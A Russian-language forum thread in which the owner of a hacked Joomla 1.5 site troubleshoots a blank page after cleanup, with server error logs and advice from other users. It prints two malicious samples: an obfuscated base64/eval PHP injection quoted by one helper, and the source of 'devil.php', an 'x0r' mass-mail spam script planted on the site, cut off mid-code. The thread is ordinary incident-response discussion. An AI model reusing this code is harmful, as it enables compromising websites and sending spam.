Сайт после взлома отказывается работать. Подробности внутри.

[master_alf]

Приветствую.
Взломали сайт, рассылали спам...
из того, что удалось обнаружить: файл devil.php в разделе /administrator/ сайта.
Файл просто рассылал письма через php на адреса которые получал...  Если нужно - могу выложить сюда файл.

Так вот, сайт на хостинге не работал, от хостеров пришло письмо, что сайт перенесли в карантин, я подумал что потому и не работает, и не стал разбираться. За сайтом пристально не следил, не патчил. Версия была 1.5.14
Слил на локальную машину копию, запустил под денвером, поправил конфиги - заработало. Залил патч 1.5.25, проверил - работает.
Снес на хостинге все файлы, залил новые - не работает. Просто белый экран.
Построчное ковыряние index.php корня сайта (не шаблона) показало, что Joomla умирает на строчке

Код:

$mainframe->render();

Хостер говорит, что у него сайт падает с ошибкой 502, мол куда-то стучится во вне. Я такой ошибки не вижу... у меня просто белый экран и всё.

Кто может что-то посоветовать? Как это победить?

[yuri-it]

без логов сложно разобраться

[master_alf]

Точно, про логи сказать-то и забыл...
Вот лог

Показать текстовый блок

[Fri Feb  3 00:13:41 2012] [error] [client 46.63.248.76] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 00:15:05 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 00:15:13 2012] [error] [client 46.63.248.76] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 00:15:15 2012] [error] [client 46.63.248.76] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 01:32:47 2012] [error] [client 85.26.184.45] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 05:54:27 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 07:39:02 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 08:49:17 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 08:49:19 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 08:49:20 2012] [error] [client 85.115.248.16] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 08:49:23 2012] [error] [client 85.115.248.16] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 09:13:27 2012] [error] [client 178.68.132.96] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 09:46:42 2012] [error] [client 89.107.37.44] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 09:50:15 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 09:51:04 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 09:52:50 2012] [error] [client 89.107.37.44] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 09:52:50 2012] [error] [client 89.107.37.44] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 09:54:48 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 09:57:32 2012] [error] PHP Warning:  getimagesize(http://essentuky-sport.ru/images/stories/DSC07254.jpg) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Operation timed out in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 75
[Fri Feb  3 13:59:44 2012] [error] [client 82.145.210.173] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 14:02:00 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/DSC06626.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:02:00 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/dsc38263.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:02:02 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/16042011562.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:17:12 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/DSC06626.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:17:12 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/dsc38263.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:17:13 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/16042011562.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:30:16 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/DSC06626.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:30:16 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/dsc38263.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:30:17 2012] [error] PHP Warning:  imagejpeg() [<a href='function.imagejpeg'>function.imagejpeg</a>]: Unable to open 'images/preview/16042011562.jpg' for writing: Permission denied in /home/u204040/essentuky-sport.ru/www/modules/mod_filterednews/helper.php on line 58
[Fri Feb  3 14:31:15 2012] [error] [client 87.242.97.5] File does not exist: /home/u204040/essentuky-sport.ru/www/favicon.ico
[Fri Feb  3 15:47:55 2012] [error] PHP Warning:  Unterminated comment starting line 2 in /home/u204040/essentuky-sport.ru/www/index.php on line 2
[Fri Feb  3 15:47:55 2012] [error] PHP Fatal error:  fatal flex scanner internal error--end of buffer missed in /home/u204040/essentuky-sport.ru/www/index.php on line 2

Ошибка которая в конце, появилась видать в следствии моих эксперементов. На второй строке этого файла только комментарии.  Да и файл в локалке работает...
лог у хостера как-то странно пишется, и не всегда данные актуальны на последний момент.

[master_alf]

Да, опять же забыл сказать - админка тоже мертва
При этом, если ломаю данные о БД в конфиге - сайт ругается, что не смог подключиться.
Один раз админка показала страницу входа, но с отладочной информацией. Решил поправить конфиг и убрать отладку. Убрал, перелил конфиг, админка снова умерла. Вернул конфиг обратно, что бы показывалась отладка - админка всё равно мертва

Вообще не понимаю что за фигня.

[oriol]

хорошо просмотри папку /images
попробуй переименовать /modules/mod_filterednews

Бэкап у тебя есть
Так что возьми и залей новый дистрибутив поверх этого с заменой (надеюсь объяснять как не нужно)

[flyingspook]

воскрешаем/реанимируем трупы
чистим от зверей
писать в ЛС

[master_alf]

хорошо просмотри папку /images
попробуй переименовать /modules/mod_filterednews

Бэкап у тебя есть
Так что возьми и залей новый дистрибутив поверх этого с заменой (надеюсь объяснять как не нужно)

Делал из этого всё... потом уже обратился на форум.

Что странно, залил сайт на новую площадку у этого же хостера - всё заработало.
Попробую заново снести весь сайт, и перезалить.

[master_alf]

Удивительное рядом - перезалил еще раз сайт, и всё заработало... Видимо где-то что-то криво распаковалось.
Хотя одно изменение я таки сделал - перебил все префиксы к базе данных. Возможно в этом и было дело...
Хотя, на локалке я базу не трогал, префиксы старые, и работает...
в общем волшебство...

[oriol]

1. Идем  в эту тему читаем практически все
2. Потом идем в эту тему и читаем только первый пост от flyingspook (остальное флуд)
Еще можно погуглить по поводу такой хрени (хотя сканер flyingspook должен найти чем он постится)

Показать текстовый блок

Код:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

3. устанавливаем глаз сайта маниторим качаем логи и сравниваем свои логи с логами чистого дистрибутива

...........Блин обрезало часть поста

P.s. Рано радоваться. Изначально он обязан работать а вот через некоторое время............ ?
Да и содержимое файлика  devil.php покажи

[master_alf]

Файл смогу показать в понедельник, он на работе остался.

[master_alf]

Devil.php который распологался в /administrator/ каталога Joomla.

Показать текстовый блок

Код:

<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

        $message = urlencode($message);
        $message = ereg_replace("%5C%22", "%22", $message);
        $message = urldecode($message);
        $message = stripslashes($message);
        $subject = stripslashes($subject);
}


?>

<html> 
<head> 
<title>x0r mailer</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</tr>
  </table>
  <p align="left"><img src="http://4.bp.blogspot.com/_PwI5O2v5hvU/SburBUwVzOI/AAAAAAAAACk/TjzmgTGDvnU/S240/devil+bat" alt="devil mailer" width="201" height="70" border="0" /></p>

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 10px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#336633" text="#FFFFFF">
<span class="style1">PHP Mass eMailer<br>
made by x0r</span>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <br>

  <table width="100%" border="0">

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Email:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="from" value="<? print $from; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Name:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="realname" value="<? print $realname; ?>" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach

          File:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="file" name="file" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="subject" value="<? print $subject; ?>" size="90">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain">

        Plain

        <input name="contenttype" type="radio" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send eMails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action){



        if (!$from && !$subject && !$message && !$emaillist){

        print "Please complete all fields before sending your message.";

        exit;

}

$allemails = split("\n", $emaillist);
        $numemails = count($allemails);
       

          for($x=0; $x<$numemails; $x++){

                $to = $allemails[$x];

                if ($to){

                $to = ereg_replace(" ", "", $to);

                $message = ereg_replace("&email&", $to, $message);

                $subject = ereg_replace("&email&", $to, $subject);

                print "Sending mail to $to.......";

                flush();

                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

                $header .= "MIME-Version: 1.0\r\n";

                $header .= "Content-Type: text/$contenttype\r\n";

